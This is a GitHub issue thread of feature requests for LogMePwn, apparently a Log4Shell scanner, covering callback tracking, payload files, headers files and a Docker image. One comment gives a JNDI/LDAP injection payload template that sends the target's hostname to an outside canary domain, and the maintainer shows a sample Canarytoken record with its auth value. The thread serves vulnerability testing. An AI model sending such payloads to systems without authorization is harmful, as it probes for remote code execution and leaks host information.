### ISSUE TITLE
Ideas List

### ISSUE THREAD

**Issue by 0xInfection** [0xInfection/LogMePwn#1]
Just noting down a few suggestions and ideas for the tool from the feeback that I've been receiving from people. _(Please comment if you have more)_:
- Support for SSH and other protocols (since they too are often logged).
- CIDR range scanning.

**Comment by ak1t4** [comment]
Hey there!

i have this idea about callback detection hits!
when we set --custom-server x.burpcollaborator.com 
we can set a flag which match URL with Collaborator Callback

for example if we call http://www.google.com.ar -> collaborator will be -> www-google-com.burpcollaborator.com
so when we have the callback hit, we know exactly in which url was 

Hope this helps to improve this great tool!

**Comment by ak1t4** [comment]
**Will be great has the ability to choose payloads list from file (payload scheme protocol, keywords, etc)

**Comment by astone75** [comment]
Great tool. It would be nice to have the initial dns name in the dns request because the hostname is often not explicit enough, param exploited could be useful as well (I did a quick and dirty fix myself in order to have the dns name as well). Also the complete Canary url should be displayed at the beginning of the script as well so you don't end up with nothing in case you stop the tool.
dns request could be something like: ${jndi:ldap://x--INITIAL_TESTED_DNS--ENCODED PARAM TESTED--${hostname}.L4J.canaryurl/asas}

**Comment by 0xInfection** [comment]
With input from @ak1t4, lets have a `-payload` argument which takes in a single payload or a file containing list of payloads which will be randomly injected into the HTTP header and body. This sounds like a great idea!

**Comment by 0xInfection** [comment]
@astone75 thanks for the input, I just wanted to let you know that after the tool generates a Canarytoken, it writes it immediately to a file which contains the token and auth. You can visit a URL like below to view the history:
```
https://canarytokens.org/history?token={token}&auth={auth}
```
e.g. if your file looks like below:
```json
{"Token": "r6c37synat690bwb6njnamzb4", "Hostname": "r6c37synat420bwb6njnamzb4.canarytokens.com", "Url_components": [["http://canarytokens.com"], ["articles", "about", "terms", "feedback", "tags", "static", "images", "traffic"], ["submit.aspx", "index.html", "post.jsp", "contact.php"]], "Error": null, "Url": "http://canarytokens.com/images/r6c37synat420bwb6njnamzb4/index.html", "Error_Message": null, "Email": "alerts@testing.site", "Auth": "f8e2785d2044f15c266e586050e888b9"}
```
Your history URL will be:
```
https://canarytokens.org/history?token=r6c37synat690bwb6njnamzb4&auth=f8e2785d2044f15c266e586050e888b9
```

Additionally if you mentioned an email or webhook, for generating the token, you can check your email or webhook directly. :)

**Comment by 0xInfection** [comment]
Another idea is to include a parameter `-headers-file` for the user to include a custom headers file instead of specifying headers list with a comma. Thanks everyone, please keep the suggestions coming!

**Comment by jauderho** [comment]
I've published a Docker image here: https://hub.docker.com/r/jauderho/logmepwn/ with the corresponding Dockerfile here: https://github.com/jauderho/dockerfiles/blob/main/logmepwn/Dockerfile

Image will be automatically rebuilt when a new release is tagged.

**Comment by 0xInfection** [comment]
All of the ideas above has been implemented in v2.0. Closing this thread!
